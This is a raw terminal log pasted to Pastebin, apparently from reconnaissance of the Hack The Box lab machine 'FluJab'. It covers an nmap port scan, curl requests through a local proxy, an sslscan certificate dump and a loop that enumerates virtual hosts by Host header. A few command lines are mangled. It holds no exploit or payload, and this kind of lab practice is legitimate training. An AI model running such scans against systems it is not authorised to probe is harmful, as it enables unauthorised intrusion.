Advertisement
Guest User

flujab.htb

a guest
Dec 31st, 2018
14,068
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 136.38 KB | None | 0 0
  1. root@kali:~/HTB/FluJab# nmap -p- --open flujab.htb
  2. Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-31 17:14 GMT
  3. Nmap scan report for flujab.htb (10.10.10.144)
  4. Host is up (0.00013s latency).
  5. rDNS record for 10.10.10.144: flujab.lan
  6. Not shown: 65531 closed ports
  7. PORT     STATE SERVICE
  8. 22/tcp   open  ssh
  9. 80/tcp   open  http
  10. 443/tcp  open  https
  11. 8080/tcp open  http-proxy
  12. MAC Address: 08:00:27:88:86:20 (Oracle VirtualBox virtual NIC)
  13.  
  14. Nmap done: 1 IP address (1 host up) scanned in 3.03 seconds
  15. root@kali:~/HTB/FluJab# ssh -vv flujab.htb
  16. OpenSSH_7.9p1 Debian-4, OpenSSL 1.1.1a  20 Nov 2018
  17. debug1: Reading configuration data /root/.ssh/config
  18. debug1: Reading configuration data /etc/ssh/ssh_config
  19. debug1: /etc/ssh/ssh_config line 19: Applying options for *
  20. debug2: resolving "flujab.htb" port 22
  21. debug2: ssh_connect_direct
  22. debug1: Connecting to flujab.htb [10.10.10.144] port 22.
  23. debug1: Connection established.
  24. debug1: identity file /root/.ssh/id_rsa type 0
  25. debug1: identity file /root/.ssh/id_rsa-cert type -1
  26. debug1: identity file /root/.ssh/id_dsa type -1
  27. debug1: identity file /root/.ssh/id_dsa-cert type -1
  28. debug1: identity file /root/.ssh/id_ecdsa type -1
  29. debug1: identity file /root/.ssh/id_ecdsa-cert type -1
  30. debug1: identity file /root/.ssh/id_ed25519 type -1
  31. debug1: identity file /root/.ssh/id_ed25519-cert type -1
  32. debug1: identity file /root/.ssh/id_xmss type -1
  33. debug1: identity file /root/.ssh/id_xmss-cert type -1
  34. debug1: Local version string SSH-2.0-OpenSSH_7.9p1 Debian-4
  35. ssh_exchange_identification: read: Connection reset by peer
  36. root@kali:~/HTB/FluJab# curl -v http://flujab.htb
  37. * Rebuilt URL to: http://flujab.htb/
  38. * Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  39. * Uses proxy env variable http_proxy == 'http://127.0.0.1:8080/'
  40. *   Trying 127.0.0.1...
  41. * TCP_NODELAY set
  42. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  43. > GET http://flujab.htb/ HTTP/1.1
  44. > Host: flujab.htb
  45. > User-Agent: curl/7.61.0
  46. > Accept: */*
  47. > Proxy-Connection: Keep-Alive
  48. >
  49. < HTTP/1.1 301 Moved Permanently
  50. < Date: Thu, 20 Dec 2018 00:33:52 GMT
  51. < Content-Type: text/html
  52. < Content-Length: 178
  53. < Connection: close
  54. < Location: https://flujab.htb/
  55. < Server: ClownWare Proxy
  56. <
  57. <html>
  58. <head><title>301 Moved Permanently</title></head>
  59. <body bgcolor="white">
  60. <center><h1>301 Moved Permanently</h1></center>
  61. <hr><center>nginx</center>
  62. </body>
  63. </html>
  64. * Closing connection 0
  65. root@kali:~/HTB/FluJab# curl -v -k https://flujab.htb
  66. * Rebuilt URL to: https://flujab.htb/
  67. * Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  68. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  69. *   Trying 127.0.0.1...
  70. * TCP_NODELAY set
  71. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  72. * allocate connect buffer!
  73. * Establish HTTP proxy tunnel to flujab.htb:443
  74. > CONNECT flujab.htb:443 HTTP/1.1
  75. > Host: flujab.htb:443
  76. > User-Agent: curl/7.61.0
  77. > Proxy-Connection: Keep-Alive
  78. >
  79. < HTTP/1.0 200 Connection established
  80. <
  81. * Proxy replied 200 to CONNECT request
  82. * CONNECT phase completed!
  83. * ALPN, offering h2
  84. * ALPN, offering http/1.1
  85. * successfully set certificate verify locations:
  86. *   CAfile: none
  87.   CApath: /etc/ssl/certs
  88. * (304) (OUT), TLS handshake, Client hello (1):
  89. * CONNECT phase completed!
  90. * CONNECT phase completed!
  91. * (304) (IN), TLS handshake, Server hello (2):
  92. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  93. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  94. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  95. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  96. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  97. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  98. * TLSv1.2 (IN), TLS handshake, Finished (20):
  99. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  100. * ALPN, server did not agree to a protocol
  101. * Server certificate:
  102. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=flujab.htb
  103. *  start date: Jan 21 17:26:12 2014 GMT
  104. *  expire date: Jan 21 17:26:12 2038 GMT
  105. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  106. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  107. > GET / HTTP/1.1
  108. > Host: flujab.htb
  109. > User-Agent: curl/7.61.0
  110. > Accept: */*
  111. >
  112. < HTTP/1.1 200 OK
  113. < Date: Thu, 20 Dec 2018 00:34:05 GMT
  114. < Content-Type: text/html; charset=UTF-8
  115. < Connection: close
  116. < Server: ClownWare Proxy
  117. < Content-Length: 3475
  118. <
  119. <!DOCTYPE html>
  120. <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
  121. <!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
  122. <!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
  123. <!--[if gt IE 8]><!-->
  124. <html class="js" style="opacity: 1; visibility: visible;" lang="en-US"><!--<![endif]--><head>
  125. <title>Direct IP access not allowed | ClownWare</title>
  126. <meta charset="UTF-8">
  127. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  128. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  129. <meta name="robots" content="noindex, nofollow">
  130. <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1">
  131. <link rel="stylesheet" id="cf_styles-css" href="index_files/cf.css" type="text/css" media="screen,projection">
  132. <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->
  133. <style type="text/css">body{margin:0;padding:0}</style>
  134.  
  135.  
  136. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/zepto.js"></script><!--<![endif]-->
  137. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/cf.js"></script><!--<![endif]-->
  138.  
  139.  
  140.  
  141. </head>
  142. <body>
  143.   <div id="cf-wrapper">
  144.     <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div>
  145.     <div id="cf-error-details" class="cf-error-details-wrapper">
  146.       <div class="cf-wrapper cf-header cf-error-overview">
  147.         <h1>
  148.           <span class="cf-error-type" data-translate="error">Error</span>
  149.           <span class="cf-error-code">1003</span>
  150.           <small class="heading-ray-id">Ray ID: 8200faea05db2a70
  151.  • 2018-12-20 00:34:05 GMT
  152. </small>
  153.         </h1>
  154.         <h2 class="cf-subheadline">Direct IP access not allowed</h2>
  155.       </div><!-- /.header -->
  156.  
  157.       <section></section><!-- spacer -->
  158.  
  159.       <div class="cf-section cf-wrapper">
  160.         <div class="cf-columns two">
  161.           <div class="cf-column">
  162.             <h2 data-translate="what_happened">What happened?</h2>
  163.             <p>You've requested an IP address that is part of the <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">ClownWare</a> network. A valid Host header must be supplied to reach the desired website.</p>
  164.          </div>
  165.  
  166.          
  167.          <div class="cf-column">
  168.            <h2 data-translate="what_can_i_do">What can I do?</h2>
  169.            <p>If you are interested in learning more about ClownWare, please <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">visit our website</a>.</p>
  170.          </div>
  171.          
  172.        </div>
  173.      </div><!-- /.section -->
  174.  
  175.      <div class="cf-error-footer cf-wrapper">
  176.  <p>
  177.    <span class="cf-footer-item">ClownWare Ray ID: <strong>a6bfdb8e3f25f144
  178. </strong></span>
  179.    <span class="cf-footer-separator">•</span>
  180.    <span class="cf-footer-item"><span>Your IP</span>: 20.20.20.81</span>
  181.    <span class="cf-footer-separator">•</span>
  182.    <span class="cf-footer-item"><span>Performance &amp; security by</span> <a href="https://clownware.htb/link.php" id="brand_link" target="https://clownware.htb/link.php">ClownWare</a></span>
  183.    
  184.  </p>
  185. </div><!-- /.error-footer -->
  186.  
  187.  
  188.    </div><!-- /#cf-error-details -->
  189.  </div><!-- /#cf-wrapper -->
  190.  
  191.  <script type="text/javascript">
  192.  window._cf_translation = {};
  193.  
  194.  
  195. </script>
  196.  
  197.  
  198.  
  199. * Closing connection 0
  200. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  201. </body></html>root@kali:~/HTB/FluJab# sslscan https://flujab.htb
  202. Version: 1.11.12-static
  203. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  204.  
  205. Connected to 10.10.10.144
  206.  
  207. Testing SSL server flujab.htb on port 443 using SNI name flujab.htb
  208.  
  209.  TLS Fallback SCSV:
  210. Server supports TLS Fallback SCSV
  211.  
  212.  TLS renegotiation:
  213. Secure session renegotiation supported
  214.  
  215.  TLS Compression:
  216. Compression disabled
  217.  
  218.  Heartbleed:
  219. TLS 1.2 not vulnerable to heartbleed
  220. TLS 1.1 not vulnerable to heartbleed
  221. TLS 1.0 not vulnerable to heartbleed
  222.  
  223.  Supported Server Cipher(s):
  224. Preferred TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve P-256 DHE 256
  225. Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-GCM-SHA384     DHE 1024 bits
  226. Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-GCM-SHA256   Curve P-256 DHE 256
  227. Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-GCM-SHA256     DHE 1024 bits
  228. Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA384       Curve P-256 DHE 256
  229. Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-SHA256         DHE 1024 bits
  230. Accepted  TLSv1.2  256 bits  ECDHE-RSA-CAMELLIA256-SHA384  Curve P-256 DHE 256
  231. Accepted  TLSv1.2  256 bits  DHE-RSA-CAMELLIA256-SHA256    DHE 1024 bits
  232. Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA256       Curve P-256 DHE 256
  233. Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-SHA256         DHE 1024 bits
  234. Accepted  TLSv1.2  128 bits  ECDHE-RSA-CAMELLIA128-SHA256  Curve P-256 DHE 256
  235. Accepted  TLSv1.2  128 bits  DHE-RSA-CAMELLIA128-SHA256    DHE 1024 bits
  236. Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
  237. Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-SHA            DHE 1024 bits
  238. Accepted  TLSv1.2  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 1024 bits
  239. Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
  240. Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-SHA            DHE 1024 bits
  241. Accepted  TLSv1.2  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 1024 bits
  242. Accepted  TLSv1.2  256 bits  AES256-GCM-SHA384            
  243. Accepted  TLSv1.2  128 bits  AES128-GCM-SHA256            
  244. Accepted  TLSv1.2  256 bits  AES256-SHA256                
  245. Accepted  TLSv1.2  256 bits  CAMELLIA256-SHA256          
  246. Accepted  TLSv1.2  128 bits  AES128-SHA256                
  247. Accepted  TLSv1.2  128 bits  CAMELLIA128-SHA256          
  248. Accepted  TLSv1.2  256 bits  AES256-SHA                  
  249. Accepted  TLSv1.2  256 bits  CAMELLIA256-SHA              
  250. Accepted  TLSv1.2  128 bits  AES128-SHA                  
  251. Accepted  TLSv1.2  128 bits  CAMELLIA128-SHA              
  252. Preferred TLSv1.1  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
  253. Accepted  TLSv1.1  256 bits  DHE-RSA-AES256-SHA            DHE 1024 bits
  254. Accepted  TLSv1.1  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 1024 bits
  255. Accepted  TLSv1.1  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
  256. Accepted  TLSv1.1  128 bits  DHE-RSA-AES128-SHA            DHE 1024 bits
  257. Accepted  TLSv1.1  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 1024 bits
  258. Accepted  TLSv1.1  256 bits  AES256-SHA                  
  259. Accepted  TLSv1.1  256 bits  CAMELLIA256-SHA              
  260. Accepted  TLSv1.1  128 bits  AES128-SHA                  
  261. Accepted  TLSv1.1  128 bits  CAMELLIA128-SHA              
  262. Preferred TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
  263. Accepted  TLSv1.0  256 bits  DHE-RSA-AES256-SHA            DHE 1024 bits
  264. Accepted  TLSv1.0  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 1024 bits
  265. Accepted  TLSv1.0  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
  266. Accepted  TLSv1.0  128 bits  DHE-RSA-AES128-SHA            DHE 1024 bits
  267. Accepted  TLSv1.0  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 1024 bits
  268. Accepted  TLSv1.0  256 bits  AES256-SHA                  
  269. Accepted  TLSv1.0  256 bits  CAMELLIA256-SHA              
  270. Accepted  TLSv1.0  128 bits  AES128-SHA                  
  271. Accepted  TLSv1.0  128 bits  CAMELLIA128-SHA              
  272.  
  273.  SSL Certificate:
  274. Signature Algorithm: sha256WithRSAEncryption
  275. RSA Key Strength:    4096
  276.  
  277. Subject:  ClownWare.htb
  278. Altnames: DNS:clownware.htb, DNS:sni147831.clownware.htb, DNS:*.clownware.htb, DNS:proxy.clownware.htb, DNS:console.flujab.htb, DNS:sys.flujab.htb, DNS:smtp.flujab.htb, DNS:vaccine4flu.htb, DNS:bestmedsupply.htb, DNS:custoomercare.megabank.htb, DNS:flowerzrus.htb, DNS:chocolateriver.htb, DNS:meetspinz.htb, DNS:rubberlove.htb, DNS:freeflujab.htb, DNS:flujab.htb
  279. Issuer:   ClownWare Certificate Authority
  280.  
  281. Not valid before: Nov 28 14:57:03 2018 GMT
  282. Not valid after:  Nov 27 14:57:03 2023 GMT
  283. root@kali:~/HTB/FluJab# mkdir FluJab
  284. root@kali:~/HTB/FluJab# cd FluJab/
  285. root@kali:~/HTB/FluJab# nano alt_names.txt
  286. root@kali:~/HTB/FluJab# sed -i s'/, DNS:/\n/'g alt_names.txt
  287. root@kali:~/HTB/FluJab# cat alt_names.txt
  288. clownware.htb
  289. sni147831.clownware.htb
  290. *.clownware.htb
  291. proxy.clownware.htb
  292. console.flujab.htb
  293. sys.flujab.htb
  294. smtp.flujab.htb
  295. vaccine4flu.htb
  296. bestmedsupply.htb
  297. custoomercare.megabank.htb
  298. flowerzrus.htb
  299. chocolateriver.htb
  300. meetspinz.htb
  301. rubberlove.htb
  302. freeflujab.htb
  303. flujab.htb
  304. root@kali:~/HTB/FluJab# for D in $(cat alt_names.txt); do printf $"\n\n$D\n---------------------"curl -v -k https://10.10.10.144/ -H "Host: $D";done
  305.  
  306.  
  307. clownware.htb
  308. ---------------------curl
  309.  
  310. sni147831.clownware.htb
  311. ---------------------curl
  312.  
  313. *.clownware.htb
  314. ---------------------curl
  315.  
  316. proxy.clownware.htb
  317. ---------------------curl
  318.  
  319. console.flujab.htb
  320. ---------------------curl
  321.  
  322. sys.flujab.htb
  323. ---------------------curl
  324.  
  325. smtp.flujab.htb
  326. ---------------------curl
  327.  
  328. vaccine4flu.htb
  329. ---------------------curl
  330.  
  331. bestmedsupply.htb
  332. ---------------------curl
  333.  
  334. custoomercare.megabank.htb
  335. ---------------------curl
  336.  
  337. flowerzrus.htb
  338. ---------------------curl
  339.  
  340. chocolateriver.htb
  341. ---------------------curl
  342.  
  343. meetspinz.htb
  344. ---------------------curl
  345.  
  346. rubberlove.htb
  347. ---------------------curl
  348.  
  349. freeflujab.htb
  350. ---------------------curl
  351.  
  352. flujab.htb
  353. root@kali:~/HTB/FluJab# lroot@kali:~/HTB/FluJab# for D in $(cat alt_names.txt); do printf $"\n\n$D\n---------------------" && curl 20.144/ -H "Host: $D";done0.144/ -H
  354. root@kali:~/HTB/FluJab# for D in $(cat alt_names.txt); do printf $"\n\n$D\n---------------------"curl -v -k https://20.20. && curl 20.144/ -H "Host: $D";done
  355.  
  356.  
  357.  
  358.  
  359.  
  360.  
  361.  
  362.  
  363.  
  364.  
  365.  
  366.  
  367.  
  368.  
  369.  
  370.  
  371.  
  372.  
  373.  
  374.  
  375.  
  376.  
  377.  
  378.  
  379.  
  380.  
  381.  
  382.  
  383.  
  384.  
  385.  
  386.  
  387.  
  388.  
  389.  
  390.  
  391.  
  392.  
  393.  
  394.  
  395.  
  396.  
  397.  
  398.  
  399.  
  400.  
  401.  
  402.  
  403.  
  404.  
  405.  
  406.  
  407.  
  408.  
  409.  
  410.  
  411.  
  412.  
  413.  
  414.  
  415.  
  416.  
  417.  
  418.  
  419.  
  420.  
  421.  
  422.  
  423.  
  424.  
  425.  
  426.  
  427.  
  428.  
  429.  
  430.  
  431.  
  432.  
  433.  
  434.  
  435.  
  436.  
  437.  
  438.  
  439.  
  440.  
  441.  
  442.  
  443.  
  444.  
  445.  
  446.  
  447.  
  448.  
  449.  
  450.  
  451.  
  452.  
  453.  
  454.  
  455.  
  456.  
  457. root@kali:~/HTB/FluJab# for D in $(cat alt_names.txt); do printf $"\n\n$D\n---------------------" && curl -v -k https://10.10.10.144/ -H "Host: $D";done
  458.  
  459.  
  460. clownware.htb
  461. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  462. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  463. *   Trying 127.0.0.1...
  464. * TCP_NODELAY set
  465. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  466. * allocate connect buffer!
  467. * Establish HTTP proxy tunnel to 10.10.10.144:443
  468. > CONNECT 10.10.10.144:443 HTTP/1.1
  469. > Host: 10.10.10.144:443
  470. > User-Agent: curl/7.61.0
  471. > Proxy-Connection: Keep-Alive
  472. >
  473. < HTTP/1.0 200 Connection established
  474. <
  475. * Proxy replied 200 to CONNECT request
  476. * CONNECT phase completed!
  477. * ALPN, offering h2
  478. * ALPN, offering http/1.1
  479. * successfully set certificate verify locations:
  480. *   CAfile: none
  481.  CApath: /etc/ssl/certs
  482. * (304) (OUT), TLS handshake, Client hello (1):
  483. * CONNECT phase completed!
  484. * CONNECT phase completed!
  485. * (304) (IN), TLS handshake, Server hello (2):
  486. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  487. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  488. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  489. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  490. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  491. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  492. * TLSv1.2 (IN), TLS handshake, Finished (20):
  493. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  494. * ALPN, server did not agree to a protocol
  495. * Server certificate:
  496. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  497. *  start date: Jan 21 17:26:12 2014 GMT
  498. *  expire date: Jan 21 17:26:12 2038 GMT
  499. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  500. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  501. > GET / HTTP/1.1
  502. > Host: clownware.htb
  503. > User-Agent: curl/7.61.0
  504. > Accept: */*
  505. >
  506. < HTTP/1.1 200 OK
  507. < Date: Thu, 20 Dec 2018 00:41:09 GMT
  508. < Content-Type: text/html; charset=UTF-8
  509. < Connection: close
  510. < Server: ClownWare Proxy
  511. < Content-Length: 3475
  512. <
  513. <!DOCTYPE html>
  514. <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
  515. <!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
  516. <!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
  517. <!--[if gt IE 8]><!-->
  518. <html class="js" style="opacity: 1; visibility: visible;" lang="en-US"><!--<![endif]--><head>
  519. <title>Direct IP access not allowed | ClownWare</title>
  520. <meta charset="UTF-8">
  521. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  522. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  523. <meta name="robots" content="noindex, nofollow">
  524. <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1">
  525. <link rel="stylesheet" id="cf_styles-css" href="index_files/cf.css" type="text/css" media="screen,projection">
  526. <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->
  527. <style type="text/css">body{margin:0;padding:0}</style>
  528.  
  529.  
  530. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/zepto.js"></script><!--<![endif]-->
  531. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/cf.js"></script><!--<![endif]-->
  532.  
  533.  
  534.  
  535. </head>
  536. <body>
  537.  <div id="cf-wrapper">
  538.    <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div>
  539.    <div id="cf-error-details" class="cf-error-details-wrapper">
  540.      <div class="cf-wrapper cf-header cf-error-overview">
  541.        <h1>
  542.          <span class="cf-error-type" data-translate="error">Error</span>
  543.          <span class="cf-error-code">1003</span>
  544.          <small class="heading-ray-id">Ray ID: 58174bcaeee9d85d
  545. • 2018-12-20 00:41:09 GMT
  546. </small>
  547.        </h1>
  548.        <h2 class="cf-subheadline">Direct IP access not allowed</h2>
  549.      </div><!-- /.header -->
  550.  
  551.      <section></section><!-- spacer -->
  552.  
  553.      <div class="cf-section cf-wrapper">
  554.        <div class="cf-columns two">
  555.          <div class="cf-column">
  556.            <h2 data-translate="what_happened">What happened?</h2>
  557.            <p>You've requested an IP address that is part of the <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">ClownWare</a> network. A valid Host header must be supplied to reach the desired website.</p>
  558.           </div>
  559.  
  560.          
  561.           <div class="cf-column">
  562.             <h2 data-translate="what_can_i_do">What can I do?</h2>
  563.             <p>If you are interested in learning more about ClownWare, please <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">visit our website</a>.</p>
  564.           </div>
  565.          
  566.         </div>
  567.       </div><!-- /.section -->
  568.  
  569.       <div class="cf-error-footer cf-wrapper">
  570.   <p>
  571.     <span class="cf-footer-item">ClownWare Ray ID: <strong>fafc46a6aae9d686
  572. </strong></span>
  573.     <span class="cf-footer-separator"></span>
  574.     <span class="cf-footer-item"><span>Your IP</span>: 20.20.20.81</span>
  575.     <span class="cf-footer-separator"></span>
  576.     <span class="cf-footer-item"><span>Performance &amp; security by</span> <a href="https://clownware.htb/link.php" id="brand_link" target="https://clownware.htb/link.php">ClownWare</a></span>
  577.    
  578.   </p>
  579. </div><!-- /.error-footer -->
  580.  
  581.  
  582.     </div><!-- /#cf-error-details -->
  583.   </div><!-- /#cf-wrapper -->
  584.  
  585.   <script type="text/javascript">
  586.   window._cf_translation = {};
  587.  
  588.  
  589. </script>
  590.  
  591.  
  592.  
  593. * Closing connection 0
  594. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  595. </body></html>
  596.  
  597. sni147831.clownware.htb
  598. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  599. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  600. *   Trying 127.0.0.1...
  601. * TCP_NODELAY set
  602. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  603. * allocate connect buffer!
  604. * Establish HTTP proxy tunnel to 10.10.10.144:443
  605. > CONNECT 10.10.10.144:443 HTTP/1.1
  606. > Host: 10.10.10.144:443
  607. > User-Agent: curl/7.61.0
  608. > Proxy-Connection: Keep-Alive
  609. >
  610. < HTTP/1.0 200 Connection established
  611. <
  612. * Proxy replied 200 to CONNECT request
  613. * CONNECT phase completed!
  614. * ALPN, offering h2
  615. * ALPN, offering http/1.1
  616. * successfully set certificate verify locations:
  617. *   CAfile: none
  618.   CApath: /etc/ssl/certs
  619. * (304) (OUT), TLS handshake, Client hello (1):
  620. * CONNECT phase completed!
  621. * CONNECT phase completed!
  622. * (304) (IN), TLS handshake, Server hello (2):
  623. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  624. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  625. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  626. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  627. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  628. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  629. * TLSv1.2 (IN), TLS handshake, Finished (20):
  630. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  631. * ALPN, server did not agree to a protocol
  632. * Server certificate:
  633. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  634. *  start date: Jan 21 17:26:12 2014 GMT
  635. *  expire date: Jan 21 17:26:12 2038 GMT
  636. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  637. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  638. > GET / HTTP/1.1
  639. > Host: sni147831.clownware.htb
  640. > User-Agent: curl/7.61.0
  641. > Accept: */*
  642. >
  643. < HTTP/1.1 200 OK
  644. < Date: Thu, 20 Dec 2018 00:41:09 GMT
  645. < Content-Type: text/html; charset=UTF-8
  646. < Connection: close
  647. < Server: ClownWare Proxy
  648. < Content-Length: 3475
  649. <
  650. <!DOCTYPE html>
  651. <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
  652. <!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
  653. <!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
  654. <!--[if gt IE 8]><!-->
  655. <html class="js" style="opacity: 1; visibility: visible;" lang="en-US"><!--<![endif]--><head>
  656. <title>Direct IP access not allowed | ClownWare</title>
  657. <meta charset="UTF-8">
  658. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  659. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  660. <meta name="robots" content="noindex, nofollow">
  661. <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1">
  662. <link rel="stylesheet" id="cf_styles-css" href="index_files/cf.css" type="text/css" media="screen,projection">
  663. <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->
  664. <style type="text/css">body{margin:0;padding:0}</style>
  665.  
  666.  
  667. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/zepto.js"></script><!--<![endif]-->
  668. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/cf.js"></script><!--<![endif]-->
  669.  
  670.  
  671.  
  672. </head>
  673. <body>
  674.   <div id="cf-wrapper">
  675.     <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div>
  676.     <div id="cf-error-details" class="cf-error-details-wrapper">
  677.       <div class="cf-wrapper cf-header cf-error-overview">
  678.         <h1>
  679.           <span class="cf-error-type" data-translate="error">Error</span>
  680.           <span class="cf-error-code">1003</span>
  681.           <small class="heading-ray-id">Ray ID: 0229d06e91a4ba7d
  682.  • 2018-12-20 00:41:09 GMT
  683. </small>
  684.         </h1>
  685.         <h2 class="cf-subheadline">Direct IP access not allowed</h2>
  686.       </div><!-- /.header -->
  687.  
  688.       <section></section><!-- spacer -->
  689.  
  690.       <div class="cf-section cf-wrapper">
  691.         <div class="cf-columns two">
  692.           <div class="cf-column">
  693.             <h2 data-translate="what_happened">What happened?</h2>
  694.             <p>You've requested an IP address that is part of the <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">ClownWare</a> network. A valid Host header must be supplied to reach the desired website.</p>
  695.          </div>
  696.  
  697.          
  698.          <div class="cf-column">
  699.            <h2 data-translate="what_can_i_do">What can I do?</h2>
  700.            <p>If you are interested in learning more about ClownWare, please <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">visit our website</a>.</p>
  701.          </div>
  702.          
  703.        </div>
  704.      </div><!-- /.section -->
  705.  
  706.      <div class="cf-error-footer cf-wrapper">
  707.  <p>
  708.    <span class="cf-footer-item">ClownWare Ray ID: <strong>b0dafa1dd9b81b68
  709. </strong></span>
  710.    <span class="cf-footer-separator">•</span>
  711.    <span class="cf-footer-item"><span>Your IP</span>: 20.20.20.81</span>
